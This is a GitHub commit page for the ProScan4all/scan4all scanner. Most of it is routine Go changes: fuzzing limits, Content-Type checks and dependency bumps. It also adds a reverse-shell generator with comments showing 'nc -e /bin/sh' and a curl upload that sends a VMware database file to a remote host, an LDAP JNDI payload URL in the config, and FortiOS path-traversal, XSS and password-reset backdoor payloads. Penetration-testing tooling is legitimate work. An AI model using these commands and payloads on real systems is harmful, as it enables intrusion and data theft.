Skip to content

Commit

Permalink
1、fuzz、及所有请求输出限制为800k,避免被反制、进行内存攻击导致程序崩溃
Browse files Browse the repository at this point in the history 
2、修复naabu、nmap扫描后使用ip继续走后续流程,导致无法正确访问目标的bug,https通常是限定只能域名访问的
3、file fuzz针对
aac、abw、arc、avif、avi、azw、bin、bmp、bz、bz2、cda、csh、css、csv、doc、docx、eot、epub、gz、gif、ico、ics、jar、jpeg、jpg、js、json、jsonld、mid、midi、mjs、mp3、mp4、mpeg、mpkg、odp、ods、odt、oga、ogv、ogx、opus、otf、png、pdf、php、ppt、pptx、rar、rtf、sh、svg、tar、tif、tiff、ts、ttf、txt、vsd、wav、weba、webm、webp、woff、woff2、xhtml、xls、xlsx、xml、xul、zip、3gp、3g2、7z
的Content-Type:  进行类型识别,跳过无用的fuzz,例如请求的是jpg,返回200的html
 2022-10-12
  • Loading branch information
@hktalent
hktalent committed Oct 12, 2022
1 parent 2f5289e commit e32d6fa
Show file tree
Hide file tree
Showing 69 changed files with 5,517 additions and 128 deletions.
8 changes: 6 additions & 2 deletions brute/filefuzz.go
View file
Original file line number Diff line number Diff line change
Expand Up @@ -160,6 +160,7 @@ type FuzzData struct {
Req *util.Page
}

// https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/MIME_types/Common_types
var r001 = regexp.MustCompile(`\.(aac)|(abw)|(arc)|(avif)|(avi)|(azw)|(bin)|(bmp)|(bz)|(bz2)|(cda)|(csh)|(css)|(csv)|(doc)|(docx)|(eot)|(epub)|(gz)|(gif)|(ico)|(ics)|(jar)|(jpeg)|(jpg)|(js)|(json)|(jsonld)|(mid)|(midi)|(mjs)|(mp3)|(mp4)|(mpeg)|(mpkg)|(odp)|(ods)|(odt)|(oga)|(ogv)|(ogx)|(opus)|(otf)|(png)|(pdf)|(php)|(ppt)|(pptx)|(rar)|(rtf)|(sh)|(svg)|(tar)|(tif)|(tiff)|(ts)|(ttf)|(txt)|(vsd)|(wav)|(weba)|(webm)|(webp)|(woff)|(woff2)|(xhtml)|(xls)|(xlsx)|(xml)|(xul)|(zip)|(3gp)|(3g2)|(7z)$`)

// 重写了fuzz:优化流程、优化算法、修复线程安全bug、增加智能功能
Expand Down Expand Up @@ -397,9 +398,12 @@ func FileFuzz(u string, indexStatusCode int, indexContentLength int, indexbody s
}
// 默认情况等待所有结束
wg.Wait()
log.Printf("fuzz is over: %s found:\n%s\n", u, strings.Join(path, "\n"))
if 0 < len(path) {
log.Printf("fuzz is over: %s found:\n%s\n", u, strings.Join(path, "\n"))
path = util.SliceRemoveDuplicates(path)
}
technologies = util.SliceRemoveDuplicates(technologies)
path = util.SliceRemoveDuplicates(path)

stop() //发停止指令
<-time.After(time.Second * 2)
stop2()
Expand Down
1 change: 1 addition & 0 deletions config/config.json
View file
Original file line number Diff line number Diff line change
@@ -1,4 +1,5 @@
{
"ldapServer": "ldap://docker.for.mac.localhost:1389/%s/#UpX34defineClass",
"LimitReader": 819200,
"OnClient": true,
"ScanPoolSize":5000,
Expand Down
Binary file modified config/scan4all_db.db
View file
Binary file not shown.
8 changes: 5 additions & 3 deletions go.mod
View file
Original file line number Diff line number Diff line change
Expand Up @@ -27,7 +27,7 @@ require (
github.com/logrusorgru/aurora v2.0.3+incompatible
github.com/pkg/errors v0.9.1
github.com/projectdiscovery/retryablehttp-go v1.0.3-0.20220604122435-c175fc8f2d4a
github.com/projectdiscovery/uncover v0.0.5
github.com/projectdiscovery/uncover v0.0.6
github.com/stretchr/testify v1.8.0
)

Expand All @@ -38,12 +38,12 @@ require (
github.com/davecgh/go-spew v1.1.1 // indirect
github.com/golang/snappy v0.0.4 // indirect
github.com/json-iterator/go v1.1.12 // indirect
github.com/miekg/dns v1.1.50 // indirect
github.com/miekg/dns v1.1.50
github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd // indirect
github.com/modern-go/reflect2 v1.0.2 // indirect
github.com/pmezard/go-difflib v1.0.0 // indirect
github.com/projectdiscovery/hmap v0.0.2
github.com/projectdiscovery/retryabledns v1.0.15 // indirect
github.com/projectdiscovery/retryabledns v1.0.15
github.com/projectdiscovery/stringsutil v0.0.1
github.com/syndtr/goleveldb v1.0.0 // indirect
github.com/yl2chen/cidranger v1.0.2 // indirect
Expand Down Expand Up @@ -105,6 +105,7 @@ require (
github.com/hktalent/jarm-go v0.0.0-20220918133110-7801447b6267
github.com/huin/asn1ber v0.0.0-20120622192748-af09f62e6358
github.com/icodeface/tls v0.0.0-20190904083142-17aec93c60e5
github.com/jinzhu/copier v0.3.5
github.com/jlaffaye/ftp v0.1.0
github.com/karlseguin/ccache v2.0.3+incompatible
github.com/lcvvvv/gonmap v1.2.1
Expand All @@ -118,6 +119,7 @@ require (
github.com/panjf2000/ants/v2 v2.5.0
github.com/projectdiscovery/folderutil v0.0.0-20220523100846-d6161a49c221
github.com/projectdiscovery/iputil v0.0.0-20220712175312-b9406f31cdd8
github.com/projectdiscovery/naabu/v2 v2.1.0
github.com/projectdiscovery/nuclei-updatecheck-api v0.0.0-20220726130814-981d44a34f84
github.com/projectdiscovery/nuclei/v2 v2.7.8
github.com/projectdiscovery/subfinder/v2 v2.5.3
Expand Down
8 changes: 8 additions & 0 deletions go.sum
View file
Original file line number Diff line number Diff line change
Expand Up @@ -571,6 +571,8 @@ github.com/jcmturner/gokrb5/v8 v8.4.3 h1:iTonLeSJOn7MVUtyMT+arAn5AKAPrkilzhGw8wE
github.com/jcmturner/gokrb5/v8 v8.4.3/go.mod h1:dqRwJGXznQrzw6cWmyo6kH+E7jksEQG/CyVWsJEsJO0=
github.com/jcmturner/rpc/v2 v2.0.3 h1:7FXXj8Ti1IaVFpSAziCZWNzbNuZmnvw/i6CqLNdWfZY=
github.com/jcmturner/rpc/v2 v2.0.3/go.mod h1:VUJYCIDm3PVOEHw8sgt091/20OJjskO/YJki3ELg/Hc=
github.com/jinzhu/copier v0.3.5 h1:GlvfUwHk62RokgqVNvYsku0TATCF7bAHVwEXoBh3iJg=
github.com/jinzhu/copier v0.3.5/go.mod h1:DfbEm0FYsaqBcKcFuvmOZb218JkPGtvSHsKg8S8hyyg=
github.com/jinzhu/inflection v1.0.0 h1:K317FqzuhWc8YvSVlFMCCUb36O/S9MCKRDI7QkRKD/E=
github.com/jinzhu/inflection v1.0.0/go.mod h1:h+uFLlag+Qp1Va5pdKtLDYj+kHp5pxUVkryuEj+Srlc=
github.com/jinzhu/now v1.1.4/go.mod h1:d3SSVoowX0Lcu0IBviAWJpolVfI5UJVZZ7cO71lE/z8=
Expand Down Expand Up @@ -903,6 +905,10 @@ github.com/projectdiscovery/mapcidr v1.0.0/go.mod h1:5QkKrV6rNQQurCZI3nNedFsAOYp
github.com/projectdiscovery/mapcidr v1.0.1/go.mod h1:/qxlpxXZQFFjHynSc9u5O0kUPzH46VskECiwLiz7/vw=
github.com/projectdiscovery/mapcidr v1.0.2 h1:ewn7hoZz8P1TJ4VqG//XMlQKg5zhj2hnEx3C9jf3sQA=
github.com/projectdiscovery/mapcidr v1.0.2/go.mod h1:9OuUDjA+FilmXToex0xMfQb0os6qMaoiuZCksai0asY=
github.com/projectdiscovery/naabu/v2 v2.0.7 h1:I1xPIbDlFPpOG1lu4y5FwVKzQrNgZL83o8Y4Q/S2aoM=
github.com/projectdiscovery/naabu/v2 v2.0.7/go.mod h1:0svSCem0xTs84sIyGVHOdrXshNSb1MRQCGuhCRh8XXA=
github.com/projectdiscovery/naabu/v2 v2.1.0 h1:KC2GlJeKhxX9eBFqA1/ac5Vse9zSV3QBqRmMTL0QXMI=
github.com/projectdiscovery/naabu/v2 v2.1.0/go.mod h1:5I3HB2IQnWpg6YEYgDHgeBq7SOK7Rsp2wJE/89uwcdA=
github.com/projectdiscovery/networkpolicy v0.0.1/go.mod h1:asvdg5wMy3LPVMGALatebKeOYH5n5fV5RCTv6DbxpIs=
github.com/projectdiscovery/networkpolicy v0.0.2-0.20220525172507-b844eafc878d/go.mod h1:asvdg5wMy3LPVMGALatebKeOYH5n5fV5RCTv6DbxpIs=
github.com/projectdiscovery/networkpolicy v0.0.2-0.20220925181336-68b15b6cbe8c h1:zMIO2xtYwynjczOvIsCZiqMSbgupK3ZO/JPNotN/85c=
Expand Down Expand Up @@ -953,6 +959,8 @@ github.com/projectdiscovery/tlsx v0.0.8 h1:+YsPi1sQ6UZUPA6eA8t1RRdbuNzy2cFb9Dvvl
github.com/projectdiscovery/tlsx v0.0.8/go.mod h1:TlIEi84Vfhs5MVGbb41UAiLkDcSIF8feca6XhyNU2KY=
github.com/projectdiscovery/uncover v0.0.5 h1:x6+96/5WwHhZxkWubTnUdNmoGdg/UIO2rwkL9VOxwmk=
github.com/projectdiscovery/uncover v0.0.5/go.mod h1:LF8NewLQXa0mI5H/6ASDy9/4sxghCTAXAhGkhKG1kb8=
github.com/projectdiscovery/uncover v0.0.6 h1:V44qqGtm7xx0sVTVvuAlQ4p8LAgfShSDeXQP1l4SxOg=
github.com/projectdiscovery/uncover v0.0.6/go.mod h1:EXhp8F74rxWFRL7RMXQA8+2lPftH+PGjB7CyvecxkHo=
github.com/projectdiscovery/urlutil v0.0.0-20210525140139-b874f06ad921/go.mod h1:oXLErqOpqEAp/ueQlknysFxHO3CUNoSiDNnkiHG+Jpo=
github.com/projectdiscovery/urlutil v0.0.0-20220606114420-c8511bedff3f h1:yW/g2I+mqEL6E2SfSdEJZWZf5FUXJa2S+u8Rrx+3EtQ=
github.com/projectdiscovery/urlutil v0.0.0-20220606114420-c8511bedff3f/go.mod h1:AIXgGkomxeaCo1P/iMI3vClLciOF7DBx3N/rDWWsBqE=
Expand Down
5 changes: 4 additions & 1 deletion lib/api/main.go
View file
Original file line number Diff line number Diff line change
Expand Up @@ -17,6 +17,9 @@ import (
// 逐步实现支持 多实例 接口 运行
func StartScan(oOpts *map[string]interface{}) {
util.DoSyncFunc(func() {
//buf1 := bytes.Buffer{}
//opt001 := naabu.DoNaabu(&buf1)

options := naaburunner.ParseOptions()
if options.Update {
util.UpdateScan4allVersionToLatest(true)
Expand Down Expand Up @@ -83,7 +86,7 @@ func StartScan(oOpts *map[string]interface{}) {
}
gologger.Info().Msg("Port scan over,web scan starting")
}
err = naabuRunner.Httpxrun()
err = naabuRunner.Httpxrun(nil, nil)
if err != nil {
gologger.Fatal().Msgf("naabuRunner.Httpxrun Could not run httpRunner: %s\n", err)
}
Expand Down
14 changes: 14 additions & 0 deletions lib/reverse/util.go
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
package reverse

import (
"encoding/base64"
"fmt"
)

// cmd nc -e /bin/sh %s %s , rhost 192.168.0.111, rport 7777
// 获取敏感文件: curl -F "file=@/storage/db/vmware-vmdir/data.mdb" http://%s:%s/ , rhost 192.168.0.111, rport 7777
// cmd nc -e /bin/sh %s %s , rhost 192.168.0.111, rport 7777
func GenLinuxShell(rhost, rport, cmd string) string {
s1 := base64.StdEncoding.EncodeToString([]byte(fmt.Sprintf(cmd, rhost, rport)))
return fmt.Sprintf("bash -c {echo,%s}|{base64,-d}|{bash,-i}", s1)
}
3 changes: 1 addition & 2 deletions main.go
View file
Original file line number Diff line number Diff line change
Expand Up @@ -8,7 +8,6 @@ import (
"log"
"net/http"
_ "net/http/pprof"
"os"
"runtime"
"runtime/debug"
)
Expand All @@ -25,7 +24,7 @@ func main() {
//os.Args = []string{"", "-host", "http://192.168.0.109", "-v"}
//os.Args = []string{"", "-host", "http://127.0.0.1", "-v"}
//os.Args = []string{"", "-host", "https://www.sina.com.cn/", "-v", "-o", "xxx.csv"}
os.Args = []string{"", "-list", "list.txt", "-v"}
//os.Args = []string{"", "-list", "list.txt", "-v"}

runtime.GOMAXPROCS(runtime.NumCPU())
util.DoInit(&config)
Expand Down
2 changes: 1 addition & 1 deletion new.txt
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,4 +2,4 @@
2、修复naabu、nmap扫描后使用ip继续走后续流程,导致无法正确访问目标的bug,https通常是限定只能域名访问的
3、file fuzz针对
aac、abw、arc、avif、avi、azw、bin、bmp、bz、bz2、cda、csh、css、csv、doc、docx、eot、epub、gz、gif、ico、ics、jar、jpeg、jpg、js、json、jsonld、mid、midi、mjs、mp3、mp4、mpeg、mpkg、odp、ods、odt、oga、ogv、ogx、opus、otf、png、pdf、php、ppt、pptx、rar、rtf、sh、svg、tar、tif、tiff、ts、ttf、txt、vsd、wav、weba、webm、webp、woff、woff2、xhtml、xls、xlsx、xml、xul、zip、3gp、3g2、7z
的Content-Type: 进行类型识别,跳过无用的fuzz
的Content-Type: 进行类型识别,跳过无用的fuzz,例如请求的是jpg,返回200的html
67 changes: 0 additions & 67 deletions pkg/httpx/internal/testutils/integration.go
View file

This file was deleted.

24 changes: 0 additions & 24 deletions pkg/httpx/runner/banner.go
View file

This file was deleted.

2 changes: 0 additions & 2 deletions pkg/httpx/runner/doc.go
View file

This file was deleted.

3 changes: 2 additions & 1 deletion pkg/httpx/runner/options.go
View file
Original file line number Diff line number Diff line change
@@ -1,6 +1,7 @@
package runner

import (
"github.com/hktalent/ProScan4all/lib/util"
"github.com/hktalent/ProScan4all/pkg/httpx/common/customheader"
"github.com/hktalent/ProScan4all/pkg/httpx/common/customlist"
customport "github.com/hktalent/ProScan4all/pkg/httpx/common/customports"
Expand Down Expand Up @@ -351,7 +352,7 @@ func ParseOptions() *Options {
//showBanner()

if options.Version {
gologger.Info().Msgf("Current Version: %s\n", Version)
gologger.Info().Msgf("Current Version: %s\n", util.Version)
os.Exit(0)
}

Expand Down
2 changes: 1 addition & 1 deletion pkg/naabu/v2/pkg/runner/options.go
View file
Original file line number Diff line number Diff line change
Expand Up @@ -128,7 +128,7 @@ func ParseOptions() *Options {
flagSet.StringVar(&options.CeyeApi, "ceyeapi", "", "ceye.io api key"),
flagSet.StringVar(&options.CeyeDomain, "ceyedomain", "", "ceye.io subdomain"),
flagSet.BoolVar(&options.NoPOC, "np", false, "Skip pocs_go check"),
flagSet.BoolVarP(&options.ScanAllIPS, "sa", "scan-all-ips", true, "scan all the IP's associated with DNS record"),
flagSet.BoolVarP(&options.ScanAllIPS, "sa", "scan-all-ips", false, "scan all the IP's associated with DNS record"),
flagSet.StringVarP(&options.ScanType, "s", "scan-type", SynScan, "type of port scan (SYN/CONNECT)"),
flagSet.StringVar(&options.SourceIP, "source-ip", "", "source ip"),
flagSet.BoolVarP(&options.InterfacesList, "il", "interface-list", false, "list available interfaces and public ip"),
Expand Down
9 changes: 7 additions & 2 deletions pkg/naabu/v2/pkg/runner/runner.go
View file
Original file line number Diff line number Diff line change
Expand Up @@ -12,6 +12,7 @@ import (
"github.com/hktalent/ProScan4all/webScan"
"github.com/projectdiscovery/fileutil"
"github.com/projectdiscovery/iputil"
runner3 "github.com/projectdiscovery/naabu/v2/pkg/runner"
"github.com/projectdiscovery/retryablehttp-go"
"log"
"net"
Expand Down Expand Up @@ -53,8 +54,12 @@ type Runner struct {

var Naabubuffer = bytes.Buffer{}

func (r *Runner) Httpxrun() error {
httpxrunner.Naabubuffer = Naabubuffer
func (r *Runner) Httpxrun(buf *bytes.Buffer, options *runner3.Options) error {
if nil != buf {
httpxrunner.Naabubuffer = *buf
} else {
httpxrunner.Naabubuffer = Naabubuffer
}
var nucleiDone = make(chan bool, 1)
Cookie := util.GetVal("Cookie")
if "" != Cookie {
Expand Down
1 change: 1 addition & 0 deletions pkg/naabu/v2/pkg/runner/targets.go
View file
Original file line number Diff line number Diff line change
Expand Up @@ -440,6 +440,7 @@ func (r *Runner) resolveFQDN(target string) ([]string, error) {
hostIPS = append(hostIPS, initialHosts[0])
}

hostIPS = util.SliceRemoveDuplicates(hostIPS)
for _, hostIP := range hostIPS {
gologger.Debug().Msgf("Using host %s for enumeration\n", hostIP)
// dedupe all the hosts and also keep track of ip => host for the output - just append new hostname
Expand Down
26 changes: 26 additions & 0 deletions pocs_go/CVE-2018-13380.go
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,26 @@
package pocs_go

/*
https://www.yisu.com/zixun/499765.html
https://github.com/ianxtianxt/CVE-2018-13379
CVE-2018-13379: Pre-auth任意文件读取,可以获得用户名和密码
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
CVE-2018-13380 Fortinet FortiOS xss漏洞
Fortinet Fortios 6.2 Fortinet Fortios 6.0.5 Fortinet Fortios 5.6.8
/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1)%3C/script%3E
/remote/loginredir?redir=6a6176617363726970743a616c65727428646f63756d656e742e646f6d61696e29
/message?title=x&msg=%26%23<svg/onload=alert(1)>;
CVE-2018-13382 Fortinet FortiOS magic后门
Fortinet Fortios 6.2 Fortinet Fortios 6.0.5 Fortinet Fortios 5.6.9 Fortinet Fortios 5.4.11
/remote/login?lang=en
changePassword修改密码
/remote/logincheck
"Referer": "https://"+ip+"/remote/login?lang=en"
"If-Modified-Since": "Sat, 1 Jan 2000 00:00:00 GMT", "Content-Type": "text/plain;charset=UTF-8", "Connection": "close"
data = {"ajax": "1", "username": username, "realm": '', "credential": newpassword, "magic": "4tinet2095866", "reqid": "0", "credential2": newpassword}
if r.status_code==200 and 'redir=/remote/hostcheck_install' in r.text:
*/
Loading

0 comments on commit e32d6fa

Please sign in to comment.